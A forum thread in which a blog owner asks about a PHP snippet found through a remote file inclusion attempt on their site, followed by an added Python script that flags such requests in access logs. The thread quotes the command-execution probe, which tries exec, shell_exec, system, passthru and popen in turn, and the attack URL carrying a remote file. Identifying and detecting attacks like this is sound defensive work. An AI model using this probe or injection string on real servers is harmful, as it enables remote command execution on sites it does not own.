Hi guys, just saw this on my blog and wonder what it was

echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
    $res = '';
    if (!empty($cfe)){
        if(function_exists('exec')){
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec')){
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system')){
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru')){
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r"))){
            $res = "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}
exit;

I see it on a url that a user is browsing on my blog
http://www.myblog.co.uk/blog/?_SERVERDOCUMENT_ROOT=http://www.filedomain_is_on.de/pid.txt??

    Without seeing the full extent of the code (where does $cfe come from?) I'd say it's a shell backdoor - effectively letting visitors to your site run commands on the server as the web server user (usually www, apache, or 'nobody').

      effectively letting visitors to your site run commands on the server as the web server user (usually www, apache, or 'nobody').

      That's what I thought. I don't know the rest of the code. I got all this from a text file on some domain in the EU that was linking to my blog.

      Thanks for the info.

        No problem. Don't forget to mark your threads resolved using the "Thread Tools" menu, if this takes care of it.

          It's a hack that tried to run a console command in every possible way, also coded poorly. You should check for every function and their result codes before going for the next. The if/elseif approach won't let you do that.

            OK, so you're saying that this code was used to try and hack my blog?

            Here is where the file is located at.
            http://www.postcon.de/pid.txt

            I have already tried to contact them to have them explain why this file is on their server and why they tried to hack my blog with it.

              No, by "it's a hack" I mean "it's a tricky way of doing something"! What r u? 😃

                What am I?

                eh?

                As I said in my first post.
                I saw a user online in my stats system and he was using a URL to the file pid.txt to piggyback onto my blog. All I wanted to know was what this file was doing.
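
Added example, not part of the thread: one way to spot requests like the one quoted in the first post, where a query parameter carries a remote URL (here also aimed at a name starting with `_SERVER`). The log lines, hosts and the function name `find_rfi_attempts` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format); hosts are placeholders.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2008:10:01:22 +0000] "GET /blog/?_SERVERDOCUMENT_ROOT=http://files.example/pid.txt?? HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"
198.51.100.4 - - [12/Mar/2008:10:02:10 +0000] "GET /blog/?p=42 HTTP/1.1" 200 8344 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2008:10:03:45 +0000] "GET /blog/?s=http+headers HTTP/1.1" 200 7001 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2008:10:04:02 +0000] "GET /blog/index.php?page=ftp://files.example/x.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
"""

# Client address and request target from one log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that is itself a remote URL.
REMOTE_VALUE = re.compile(r'^(?:https?|ftp)://', re.I)
# Parameter names that try to overwrite a PHP superglobal.
SUPERGLOBAL = re.compile(
    r'^(?:_SERVER|_GET|_POST|_COOKIE|_REQUEST|_ENV|_FILES|_SESSION|GLOBALS)')

def find_rfi_attempts(log_text):
    """Return one finding per query parameter whose value is a remote URL."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line we understand
        client, target = m.groups()
        for name, value in parse_qsl(urlsplit(target).query,
                                     keep_blank_values=True):
            if REMOTE_VALUE.match(value):
                findings.append({
                    "client": client,
                    "param": name,
                    "remote_url": value.rstrip("?"),
                    "targets_superglobal": bool(SUPERGLOBAL.match(name)),
                    "trailing_qmark": value.endswith("?"),
                })
    return findings

if __name__ == "__main__":
    for finding in find_rfi_attempts(SAMPLE_LOG):
        print(finding)
```
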
